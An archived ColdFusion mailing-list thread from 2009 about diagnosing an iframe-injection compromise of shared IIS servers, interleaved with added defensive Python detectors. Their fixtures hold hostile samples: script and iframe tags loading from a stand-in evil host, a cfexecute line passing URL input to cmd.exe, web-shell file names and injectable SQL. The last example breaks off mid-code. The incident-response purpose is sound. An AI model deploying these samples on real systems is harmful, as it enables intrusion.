ColdFusion Talk (CF-Talk)
Question about hack
Author: ALL
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#322081
Well, in our case, we already fixed the problem that allowed the person to
upload in the first place.
I posted it in one of the first posts in this thread.
The problem we were having was finding the script that was still getting
run, which we finally found.
On Thu, Apr 30, 2009 at 10:53 AM, Dave Watts <dwatts@figleaf.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#322080
----- Excess quoted text cut - see Original Post for more -----
Well, actually, that's not the final cause of the problem, just to be
clear. The cause was whatever allowed someone to upload the file in
the first place.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#322079
Nate,
Thanks for the post follow up. Very helpful.
-Mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
Author: ALL
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#322077
We finally fixed our issue.
After a long crackdown on security on our server, one of our sites (the one
that was causing all the fuss) gave me its name, and after about 2 minutes it
was quite clear what was causing it.
mw.asp - (contents can be found here: http://pastebin.com/f5d798bd1 )
We already moved the sites that had important info to another *secure*
server, so until we get the DNS info to all the sites so we can migrate them
over to another server, we are going to have to stick with this one for a
few weeks.
Just figured I'd share the final cause of the problem.
-Nathan
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321901
> The issue with formatting is that it will likely come back when we move our
> sites back onto the server....
> From what I am gathering it is actually being ran manually, not on
> a scheduled task and likely remotely.
>
> I "Believe" this is coming from ASP and not coldfusion itself, due to
> articles like this
Well, it's your job to secure the new server so that this doesn't
happen. But the server is compromised right now to a degree that I
wouldn't want to guarantee you can fix the problem.
Author: ALL
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321898
The issue with formatting is that it will likely come back when we move our
sites back onto the server....
From what I am gathering it is actually being run manually, not on
a scheduled task, and likely remotely.
I "believe" this is coming from ASP and not ColdFusion itself, due to
articles like this:
http://translate.google.com/translate?hl=en&sl=zh-CN&u=http://q.163.com/lianglimi/blog/hhl101@126/669001092009320624566/&ei=B7bwSfuPDcWFtgfP7YW-Dw&sa=X&oi=translate&resnum=1&ct=result&prev=/search%3Fq%3Dcscript%2Bscan.vbe%26hl%3Den%26rlz%3D1C1GGLS_enUS324US324%26sa%3DG
(originally in Chinese or something; I used Google to translate it).
On Thu, Apr 23, 2009 at 10:02 AM, Mark Kruger
<mkruger@cfwebtools.com>wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321873
Nate,
Excellent ...thanks for this.
-mark
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321850
> I strongly recommend that you reformat the disk and reinstall. The
Much nodding here too !
If you can afford to, and it contains any sort of sensitive data, you really
need to take this opportunity to buy all new hardware - anything could be
running (in the BIOS, in the hypervisor, ...)
--
Helping to biannually extend infrastructures as part of the IT team of the
year, '09 and '08
Tom Chiverton
Developer
Tel: +44 0161 618 5032
Fax: +44 0161 618 5099
Tom.Chiverton@halliwells.com
3 Hardman Square, Manchester, M3 3EB
www.Halliwells.com
Author: James Holmes
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321849
Some further instructions in this instructional video:
http://www.youtube.com/watch?v=k-GaRKDsz-Y
mxAjax / CFAjax docs and other useful articles:
http://www.bifrost.com.au/blog/
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321848
----- Excess quoted text cut - see Original Post for more -----
I strongly recommend that you reformat the disk and reinstall. The
machine has been compromised, and you really can't make it trustable
again. If it's just a CF server, copy the CF files, export your CF
settings, and after you reinstall Windows and CF you should be able to
restore functionality pretty quickly.
Author: ALL
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321844
Not sure if any more info on this subject has come up, but here are the
contents of the file gm.vbs that was doing all the dirty work:
http://paste-it.net/public/v22f672/
I have also noticed a new file named
1.exe in the c:\ root directory. It has an icon of "BMW" (the car company);
not sure if that has something to do with it either.
-Nathan
On Thu, Apr 16, 2009 at 7:56 PM, Al Musella, DPM
<musella@virtualtrials.com>wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321715
A few ideas:
1. Set the FTP security to only allow
connections from specific IP addresses. If the
user has a dynamic IP, then use his entire
range. Better than letting the entire world in.
2. Your blog shows why I said to Michael to
reformat the drive and reinstall everything when
he was attacked. Once you let someone else get
access to your server, there is no way you can
ever trust it again. It has to be reformatted.
3. I know it isn't the right way to fight an
attack, but for this specific attack, just
put your index.cfm file into a different file,
then have your index.cfm file just do a
cflocation to that page. If the hack adds stuff
to the index.cfm page, nothing will happen to the users.
At 03:31 PM 4/16/2009, you wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321708
Awesome, Nate... I'm going to add this as an addendum to my post...
Author: ALL
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321703
Hey, thanks Mark. I learnt a bit more about it from reading your article and
found more info on it last night when (as you stated) 9:00 rolled around...
I have been running a process monitor program that tracks file changes to
see what process/program is actually changing the files, and it was coming
from cscript.exe, which is the executable that runs *.vbs scripts and other
"visual" languages. The executing script was "c:/gm.vbs", but the script did
not exist when I went looking for it....
So my thoughts on it are that this is just the part doing the dirty work, and
there is an actual executable or service somewhere that is making the file
and executing it.
Here is the info my process monitor spit out about the cscript.exe file that
was doing the dirty work:
Path: "C:\WINDOWS\system32\cscript.exe"
Command Line: "cscript c:\gm.vbs d:\inetpub"
User: "NT AUTHORITY\SYSTEM"
Started: "4/15/2009 8:57:58 PM"
Ended: "4/15/2009 9:01:11 PM"
Architecture: 32-bit
I hope this may help anyone else working on this issue, I believe I am
extremely close to solving it and just need it to run once more, because
this time I have the process monitor tracking almost everything.
-Nathan Bruer
On Thu, Apr 16, 2009 at 1:31 PM, Mark Kruger <mkruger@cfwebtools.com>
wrote:
----- Excess quoted text cut - see Original Post for more -----
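A small detector over a Process Monitor export, added here as an example and not code from the thread. It reads the CSV column layout that Process Monitor's File > Save produces (Time of Day, Process Name, PID, Operation, Path, Result, Detail; assumed here) and flags the two things Nathan's capture shows: a script host (cscript.exe or wscript.exe) being launched, and any process other than the web server or ColdFusion (jrun.exe, w3wp.exe and inetinfo.exe form an assumed allow-list) writing to an index.* file under inetpub. The events below are constructed to mirror his capture, not a real trace.

```python
import csv
import io
import re

# Constructed Process Monitor CSV export. Column set assumed to be the
# default one Process Monitor writes; the events are made up to mirror
# the thread (cscript.exe running c:\gm.vbs against d:\inetpub), not real.
PROCMON_CSV = r"""Time of Day,Process Name,PID,Operation,Path,Result,Detail
8:57:58.1 PM,services.exe,620,Process Create,C:\WINDOWS\system32\cscript.exe,SUCCESS,"PID: 3104, Command line: cscript c:\gm.vbs d:\inetpub"
8:57:58.4 PM,cscript.exe,3104,CreateFile,C:\gm.vbs,SUCCESS,"Desired Access: Generic Read"
8:58:01.2 PM,cscript.exe,3104,WriteFile,D:\inetpub\site1\index.cfm,SUCCESS,"Offset: 0, Length: 4,213"
8:58:01.3 PM,cscript.exe,3104,WriteFile,D:\inetpub\site2\index.html,SUCCESS,"Offset: 0, Length: 1,880"
8:58:02.0 PM,jrun.exe,1504,WriteFile,D:\inetpub\site1\uploads\photo.jpg,SUCCESS,"Offset: 0, Length: 51,200"
8:58:03.7 PM,w3wp.exe,2200,ReadFile,D:\inetpub\site1\index.cfm,SUCCESS,"Offset: 0, Length: 4,213"
9:01:11.0 PM,cscript.exe,3104,Process Exit,C:\WINDOWS\system32\cscript.exe,SUCCESS,"Exit Status: 0"
"""

# Windows Script Host binaries: any launch of these on a web server is worth a look.
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}

# Assumed allow-list of processes that legitimately write under the webroot
# (IIS worker, CF7's JRun, IIS 5 inetinfo). Tune to the box.
WEBROOT_WRITERS_OK = {"jrun.exe", "w3wp.exe", "inetinfo.exe"}

# index.<anything> anywhere below an inetpub directory, case-insensitive.
INDEX_RE = re.compile(r"\\inetpub\\.*\\index\.[a-z0-9]+$", re.I)


def scan_procmon(csv_text):
    """Return human-readable findings for script-host launches and
    webroot index.* writes by processes outside the allow-list."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        op = row["Operation"]
        proc = row["Process Name"].lower()
        path = row["Path"]
        image = path.lower().rsplit("\\", 1)[-1]
        if op == "Process Create" and image in SCRIPT_HOSTS:
            # Detail carries the child PID and full command line.
            findings.append("script host started by %s: %s" % (proc, row["Detail"]))
        if op == "WriteFile" and INDEX_RE.search(path) and proc not in WEBROOT_WRITERS_OK:
            findings.append("%s (PID %s) wrote %s" % (proc, row["PID"], path))
    return findings


if __name__ == "__main__":
    for line in scan_procmon(PROCMON_CSV):
        print(line)
```

On a live capture, save the Process Monitor log as CSV with the default columns and feed the file to scan_procmon; the Process Create line gives the parent and the command line, which is the lead Nathan was still missing (what creates and launches gm.vbs), and the WriteFile lines show which sites were touched in that run.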
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321695
For those interested I have compiled all I know about this attack into a
blog post:
http://www.coldfusionmuse.com/index.cfm/2009/4/16/iframe.insertion.hack
Again, we have not specifically identified the attack but we have lots of
information and a stop gap measure :)
-Mark
Author: Richard White
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321602
Thanks for the info. At least we know what to look for now. We will also try to
set up something similar. Thanks again.
----- Excess quoted text cut - see Original Post for more -----
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321601
No - if you are hacked, the home page is available, but it includes a
javascript that does bad things to the visitors.
The most common way is a sql injection attack, where they insert the
javascript into some fields in the database, (in my case, they
appended the javascript to all vchar fields in every table) so when
you display information on the website from the database, you
inadvertently are also adding that javascript to the page.
The recent attack that is being talked about has the attacker
editing the index.cfm page and directly adding javascript to it.
In both types of attacks, the home page is available and you might
not notice anything just by looking at it.
So my idea to detect it is to set up a cfhttp call to the index.cfm page.
I add a url parameter that signifies that the page should also
display my own personal information from one of the tables. I do this
because I know I won't change the information in the table, and if it
does change, there was a problem.
So the first time I do the cfhttp call, I save the page, then all
subsequent calls get compared to it. If it changes, or is not
available, I send an alert to my cell phone.
I do this as an automated task from a different server so I can test
if the website is up also.
One problem I had was my banner ad changes.. so I put a comment
around the banner ad that says "start banner" "end banner", and snip
that section out before comparing it.
At 12:34 PM 4/14/2009, you wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321598
Thanks... I'll add that to my list.
I have a pretty hefty blog post coming out on this tomorrow (or hopefully
tomorrow :).
-mark
Author: Gerald Guido
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321595
Mark,
I can confirm that there has been FTP related 'sploits going around.
I received a message from a hosting company warning that:
"There is a potential security exploit within the FTP software that we use
on your account."
Just a 411
G!
----- Excess quoted text cut - see Original Post for more -----
Author: Richard White
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321580
Thanks for the info.
----- Excess quoted text cut - see Original Post for more -----
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321578
> this sounds like a good idea. when a hack is taking place would the home
> page not be available? is this because they are running multiple scripts
> which takes all the resources?
Many automated attacks deface your existing pages, or append
additional content to those pages. Not all do, of course.
Author: Richard White
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321577
This sounds like a good idea. When a hack is taking place, would the home page not
be available? Is this because they are running multiple scripts which take all
the resources?
Can you explain this a little more, as I feel like it is a good idea and would
like to understand how to implement it.
Thanks
----- Excess quoted text cut - see Original Post for more -----
Author: Donnie Bachan (Gmail)
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321565
Hi Mark,
I only mentioned cfexecute because of the permissions set on our
specific case. Your info seems most likely. I did notice that there
was a cfm file created with a call to cfexecute on the webroot so this
should be a check as well.
best regards
Donnie
----- Excess quoted text cut - see Original Post for more -----
Author: Nick Gleason
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321557
Donnie, Mark,
Our research so far seems to support Mark's analysis of this problem.
There are still some unknowns here so that may change. But, changing your
FTP accounts and setting your FTP server to ban IPs after a certain number
of failed login attempts will prevent most brute force attempts on FTP. Our
server admin didn't do that which appears to have been a mistake.
Nick
----- Excess quoted text cut - see Original Post for more -----
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321555
To test if I have been hacked: I run an automated task from my
home computer that requests my home page every 15 minutes. I use a
URL variable that tells my home page to display a footer (which only
appears when this particular url variable is present) which shows my
name, address, phone, email address and a few other fields taken from
my "members" table. I then compare what is displayed to what I know
belongs there. (The only part that changes is the banner ad, which I
ignore) IF the page isn't available, or if any of the text
changes, I send an alert to my cell phone. When I was hacked last
year, every table in my database had a javascript inserted into it.
This will alert me if that happens again. I do this for my 3 most
important web sites.
----- Excess quoted text cut - see Original Post for more -----
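Al's canary check, from this post and his fuller description earlier in the thread (the cfhttp comparison with the banner snipped out), as an added Python example; it is not code from the thread, and the HTML, the start/end banner comments and the canary footer text are constructed. The banner is cut out before hashing, the footer is compared to the known value, and anything else that changed, or an unreachable page, is reported. How the alert is delivered (Al uses his cell phone) is left to the caller.

```python
import hashlib
import re
import urllib.request

# Constructed sample pages (not captured from any real site). The marker
# comments around the ad and the footer that appears only with the secret
# URL parameter follow the scheme Al describes.
BASELINE_HTML = """<html><body>
<h1>Welcome</h1>
<!-- start banner --><a href="/ads/42">Ad of the day</a><!-- end banner -->
<p>Latest news ...</p>
<div id="canary">Al Musella | 123 Main St | 555-0100 | al@example.org</div>
</body></html>"""

# Same page later: only the rotating banner changed. Must NOT alert.
CLEAN_LATER = BASELINE_HTML.replace("/ads/42", "/ads/77").replace("Ad of the day", "Another ad")

# index.* edited on disk: an iframe appended after the page (Mark's case).
INJECTED_FILE = BASELINE_HTML + '<iframe src="http://evil.invalid/x.htm" width=0 height=0></iframe>'

# Script appended to a varchar column in the members table (Al's case),
# so it surfaces inside the canary footer.
INJECTED_DB = BASELINE_HTML.replace(
    "al@example.org", 'al@example.org<script src="http://evil.invalid/j.js"></script>')

BANNER_RE = re.compile(r"<!-- start banner -->.*?<!-- end banner -->", re.S)
CANARY_RE = re.compile(r'<div id="canary">(.*?)</div>', re.S)
EXPECTED_CANARY = "Al Musella | 123 Main St | 555-0100 | al@example.org"


def fetch(url, timeout=15):
    """Fetch the canary URL; None means unavailable, which also alerts."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except Exception:
        return None


def normalize(html):
    """Drop the section that legitimately changes between fetches."""
    return BANNER_RE.sub("", html)


def fingerprint(html):
    return hashlib.sha256(normalize(html).encode()).hexdigest()


def check_page(html, baseline_fp):
    """Return a list of problems; an empty list means the page is as expected."""
    if html is None:
        return ["page unavailable"]
    problems = []
    m = CANARY_RE.search(html)
    if not m:
        problems.append("canary footer missing")
    elif m.group(1) != EXPECTED_CANARY:
        problems.append("canary footer changed: %r" % m.group(1))
    if fingerprint(html) != baseline_fp:
        problems.append("page content changed outside banner")
    return problems


if __name__ == "__main__":
    baseline = fingerprint(BASELINE_HTML)  # first fetch is saved as the reference
    for label, page in [("clean", CLEAN_LATER), ("file", INJECTED_FILE),
                        ("db", INJECTED_DB), ("down", None)]:
        print(label, check_page(page, baseline) or "OK")
```

Run it from a machine other than the web server, as Al does, so a dead server is also noticed; the baseline hash must be recomputed after every deliberate change to the page, otherwise the monitor will page you for your own deployments.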
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321554
Donnie,
I believe this is the same attack I have been helping another customer with
and it does not appear to be related to CF. Instead, it appears to start
with a malware install of some kind on the server (and possibly a root kit)
and then progress to the creation of accounts and the changing of file
permissions. Another theory gaining weight (and illustrating that we don't
know much yet) is that this attack is an agent on a client computer that
piggybacks onto FTP - which explains a few things but not everything. I'm
guessing some combination at this point.
Anyway, I agree that cfexecute is a dangerous tag that needs to be
controlled, but it does not appear to be the culprit. All of this advice is
good, but the only place that CF comes into play on this particular hack
happens to be the propensity to use "index.cfm" as the home page script. The
attack targets "index.*" files and affects (on the server I am working with)
index.cfm, index.html and index.php etc.
-Mark
Author: Andy Matthews
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321552
Checking log files, reviewing websites, automated emails with error
messages. Those are just a few examples.
Author: Donnie Bachan (Gmail)
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321551
Hi Nick,
I know this post is a bit late but to your original question, that
attack is as a result of incorrect file/iis permissions and is not an
XSS attack. I would even bet that you are on a shared server (at HMS)
since one of my client sites had this exact same problem. The attacker
would have gained access to the file system (possibly via FTP) and
executed code that injected the code into all index.* files on the
server (not just your hosting account). We have had a lot of problems
trying to get this sorted out. It appears that the issue was with
security related to the windows script host and/or CFEXECUTE. The only
thing you can do to prevent this is work with your hosting provider to
secure the system or move to a VPS or dedicated account and make sure
your FTP accounts are secure.
HTH
Donnie Bachan
"Nitendo Vinces - By Striving You Shall Conquer"
----- Excess quoted text cut - see Original Post for more -----
Author: Richard White
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321550
Hi Dave, I have scripts that write to the file system as well. What would I need
to do to secure them? Do you have a link that I could read in relation to this, as
I am a little lost as to what to do.
Thanks
----- Excess quoted text cut - see Original Post for more -----
Author: Richard White
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321549
> We have been attacked by the exact same hack. We discovered it on
> April 6 and it has proven impossible to clean/remove.
Hi, I am relatively new to CF and building web applications. I have built a few
web apps and tried to use as much security as I can. My question is, how do you
guys discover that you have been hacked? Would a hosting company let you know?
Does the customer let you know of changes in behaviour? Do you have a piece of
software looking for anything suspicious in the logs, etc.?
Thanks
Author: ALL
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321520
Jason, look for a file named logs.asp or log.asp, or one named top.aspx. If
you see either of those files on your computer, look at them and possibly
delete them. Those were the files where the infection was being
told what to do.
Also, will you tell me what Content Management System any of you guys that
have the infection use? Because I am starting to think the only thing that
is relating this to ColdFusion is that CMS, which is very insecure and very
old.
Also, seeing as how the info we are experiencing is the same, I figured I'd post
the IP address of what infected us in the first place:
61.236.71.195
Check your log files, see if that IP address turns up, and see what happened
for yourself. The IP address turns out to be something in China, I believe.
----- Excess quoted text cut - see Original Post for more -----
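Nathan's suggestion to look for that address in the logs, as an added example (Python, not from the thread). It parses IIS W3C extended logs from the #Fields header, lists the hits from one client address, flags requests for the file names reported in this thread (logs.asp, log.asp, top.aspx, mw.asp) and records when each client was first seen. The log lines are constructed; the IP address is the one Nathan posted, and the /admin/upload.cfm path is invented for the sample.

```python
# Constructed IIS 6 W3C log excerpt. The field list is the common IIS 6
# default; the request lines are made up, with the client address Nathan
# posted and a made-up upload path.
IIS_LOG = """#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-04-10 00:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2009-04-10 02:14:07 10.0.0.5 GET /index.cfm - 80 - 192.0.2.10 Mozilla/4.0+(compatible;+MSIE+7.0) 200 0 0
2009-04-10 02:15:31 10.0.0.5 POST /admin/upload.cfm - 80 - 61.236.71.195 Mozilla/4.0+(compatible;+MSIE+6.0) 200 0 0
2009-04-10 02:15:40 10.0.0.5 GET /images/logs.asp action=cmd 80 - 61.236.71.195 Mozilla/4.0+(compatible;+MSIE+6.0) 200 0 0
2009-04-10 02:16:02 10.0.0.5 GET /top.aspx - 80 - 61.236.71.195 Mozilla/4.0+(compatible;+MSIE+6.0) 404 0 2
2009-04-10 02:20:15 10.0.0.5 GET /index.cfm - 80 - 198.51.100.7 Mozilla/5.0 200 0 0
"""

# File names reported in the thread as carrying the attacker's instructions.
SUSPECT_FILES = {"logs.asp", "log.asp", "top.aspx", "mw.asp"}
# Client address Nathan posted.
SUSPECT_IP = "61.236.71.195"


def parse_w3c(text):
    """Turn a W3C extended log into dicts keyed by the names in #Fields."""
    fields, records = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]       # field list can change mid-file
            continue
        if line.startswith("#"):
            continue                        # other directives
        values = line.split(" ")
        records.append(dict(zip(fields, values)))
    return records


def hits_from(records, ip):
    return [r for r in records if r.get("c-ip") == ip]


def suspicious_requests(records):
    """Requests whose file name matches one reported in the thread."""
    out = []
    for r in records:
        name = r["cs-uri-stem"].rsplit("/", 1)[-1].lower()
        if name in SUSPECT_FILES:
            out.append((r["date"] + " " + r["time"], r["c-ip"], r["cs-uri-stem"], r["sc-status"]))
    return out


def first_seen(records):
    """Earliest timestamp per client address, to date the initial access."""
    seen = {}
    for r in records:
        seen.setdefault(r["c-ip"], r["date"] + " " + r["time"])
    return seen


if __name__ == "__main__":
    recs = parse_w3c(IIS_LOG)
    for r in hits_from(recs, SUSPECT_IP):
        print(r["time"], r["cs-method"], r["cs-uri-stem"], r["sc-status"])
    print(suspicious_requests(recs))
    print(first_seen(recs).get(SUSPECT_IP))
```

A 200 on a request for a script that should not exist in an images or uploads directory is the line to start from; walk backwards from the first-seen time of that client to find the request that put the file there. On a shared host the logs live per site, so run it over every site's log directory, not only the one that complained.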
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321519
> We are having to scrub our files to remove the injected code (which is being
> written directly to the files as the result of the hack allowing "FULL CONTROL"
> for the Everyone user on the machine.
>
> Have you determined a solution for removing/preventing this?
First, audit your code to find any scripts that can write to the filesystem.
Second, audit your code to find any scripts that pass unfiltered user
input to the database.
Third, fix that code.
Fourth, configure filesystem permissions properly to prevent CF or
your database from writing to the web server's webroot.
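Dave's first two steps, as an added example (Python, not from the thread): a rough static scan of .cfm sources for tags that write to the filesystem or run programs (cffile and cfdirectory with a write-type action, and cfexecute, which Donnie found dropped into a webroot) and for cfquery bodies that interpolate #variables# outside a cfqueryparam. The sample sources are constructed; the regexes are deliberately loose and meant to produce a list to review by hand, not a verdict.

```python
import re

# Constructed sample .cfm sources standing in for an application's code
# tree (none of these come from the thread).
SAMPLES = {
    "search.cfm": """<cfquery name="q" datasource="#application.dsn#">
  SELECT id, title FROM articles WHERE id = #url.id#
</cfquery>""",
    "search_fixed.cfm": """<cfquery name="q" datasource="#application.dsn#">
  SELECT id, title FROM articles
  WHERE id = <cfqueryparam value="#url.id#" cfsqltype="cf_sql_integer">
</cfquery>""",
    "upload.cfm": """<cffile action="upload" filefield="form.photo"
  destination="#expandPath('./images')#" nameconflict="makeunique">""",
    "x.cfm": """<cfexecute name="c:\\windows\\system32\\cmd.exe" arguments="/c #url.c#" timeout="10"></cfexecute>""",
    "about.cfm": """<cfset title = "About us"><cfoutput>#title#</cfoutput>""",
}

# cffile / cfdirectory with an action that changes the filesystem.
WRITE_TAGS = re.compile(
    r'<cf(file|directory)\b[^>]*action\s*=\s*"(upload|write|append|copy|move|rename|delete|create)"',
    re.I)
EXEC_TAG = re.compile(r"<cfexecute\b", re.I)
# Body of each cfquery; then any #...# left after cfqueryparam tags are removed.
QUERY_BLOCK = re.compile(r"<cfquery\b[^>]*>(.*?)</cfquery>", re.I | re.S)
QUERYPARAM = re.compile(r"<cfqueryparam\b[^>]*>", re.I)
INTERP = re.compile(r"#[^#\n]+#")


def audit(sources):
    """Return (file, category, evidence) triples for manual review."""
    findings = []
    for name, src in sources.items():
        for m in WRITE_TAGS.finditer(src):
            tag = m.group(0).split()[0]     # "<cffile" or "<cfdirectory"
            findings.append((name, "filesystem-write", tag + " action=" + m.group(2)))
        for m in EXEC_TAG.finditer(src):
            findings.append((name, "cfexecute", m.group(0)))
        for m in QUERY_BLOCK.finditer(src):
            body = QUERYPARAM.sub("", m.group(1))   # values inside cfqueryparam are bound, not concatenated
            for var in INTERP.findall(body):
                findings.append((name, "unparameterized-sql", var))
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLES):
        print("%-18s %-20s %s" % f)
```

To run it over a real tree, build the dict from os.walk over the webroot, reading every .cfm and .cfc. Dave's fourth step is not something a scanner can check: after the code is fixed, the account ColdFusion runs as should have no write permission on the webroot except the specific upload directory, and that directory should not have script execution enabled in IIS.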
Author: Jason Bach
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321518
Nick:
We have been attacked by the exact same hack. We discovered it on April 6 and
it has proven impossible to clean/remove.
I have read through this thread, but I don't see where you found anything
specifically causing the problem.
We are also using IIS6 and CF7 and have approx 300 sites on this shared
webserver.
We are having to scrub our files to remove the injected code (which is being
written directly to the files as the result of the hack allowing "FULL CONTROL"
for the Everyone user on the machine).
Have you determined a solution for removing/preventing this?
Let me know.
JB
----- Excess quoted text cut - see Original Post for more -----
Author: Matthew
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321516
OK thanks for the pointers all, I better roll my sleeves up and start editing
before I get done...
On 10 Apr 2009, at 18:21, "Brad Wood" <brad@bradwood.com> wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Matthew Allen
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321515
I've always had the impression that if you use a stored procedure, and it's
not a dynamically built string, you're fine. So, like my example in a previous post,
you put your query in MS SQL and use EXEC to call the query on your CF pages. I
sometimes declare the parameter, but most times it's the way I've described
before. Should I stop everything I'm doing now and start editing my code?!
Luckily I'm less than 2 years in CF; I only have about 6 applications to worry
about.
Stored Proc:
CREATE PROCEDURE usp_getSomeData
    @uid uniqueidentifier
AS
BEGIN
    SELECT ID, column1, column2 -- etc.
    FROM tbltable
    WHERE UID = @uid
END

CF Page:
<cfquery name="doStuff" datasource="#application.DSN#">
    <!--- url.uid is pasted straight into the SQL text, inside single quotes --->
    EXEC usp_getSomeData @uid = '#url.uid#'
</cfquery>
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321514
Using MS SQL, the code below would be safe as long as all your parameters are
strings and encased in single quotes, since the cfquery tag will
automatically escape any single quotes that exist in the #url.uid# variable.
If you were to pass in a numeric value to the stored procedure which did not
have single ticks around it, you would be vulnerable again, even though it is
a stored proc call.
If it's all the same to you, I would recommend using the cfstoredproc tag to
call your procedure. It allows for the cfprocparam tag for your parameters,
which can optionally validate your inputs' data type as well (just like
cfqueryparam does).
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321513
Matt,
Why are you not using cfqueryparam in the CF code below? Do you have a good
reason not to do so?
-mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
----- Excess quoted text cut - see Original Post for more -----
Author: Matthew Allen
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321512
OK, point taken: not safe with MySQL, but fine with MSSQL? I just need to know if I
should start working on my old MS SQL code; so far none have suffered
injection attacks. It might be by sheer luck, or maybe all is well with it as it is
on an MS SQL server, right?
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:59164#321509
Not necessarily. With the proper configuration of MySQL (multiple statements
allowed, and \ escaping single quotes) your example below could be hacked.
http://www.codersrevolution.com/index.cfm/2008/7/13/Just-when-you-felt-safe-SQL-Injection-and-MySQL
The underlying reason is because you are not explicitly telling your SQL
server what is SQL code and what is the parameter. The one and only
sure-fire way to do that is with the likes of cfqueryparam, cfprocparam, or
sp_executesql (MS SQL Server).
~Brad
----- Excess quoted text cut - see Original Post for more -----
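The point Brad makes here and in his reply above (a string value inside single quotes survives cfquery's automatic quote escaping, an unquoted numeric value does not, and only a bound parameter via cfqueryparam, cfprocparam or sp_executesql tells the server where the SQL ends and the data begins) can be reproduced outside ColdFusion. The following is an added illustration in Python against an in-memory SQLite table, not code from this thread. The table, its rows, the `escape_quotes` stand-in for cfquery's automatic escaping, and the hostile input are all constructed for the example; `lookup_typed` plays the role of a typed cfqueryparam (cf_sql_integer).

```python
import sqlite3


# Constructed stand-in for the "tbltable" of the thread: three rows, one secret each.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tbltable (id INTEGER PRIMARY KEY, uid TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO tbltable (uid, secret) VALUES (?, ?)",
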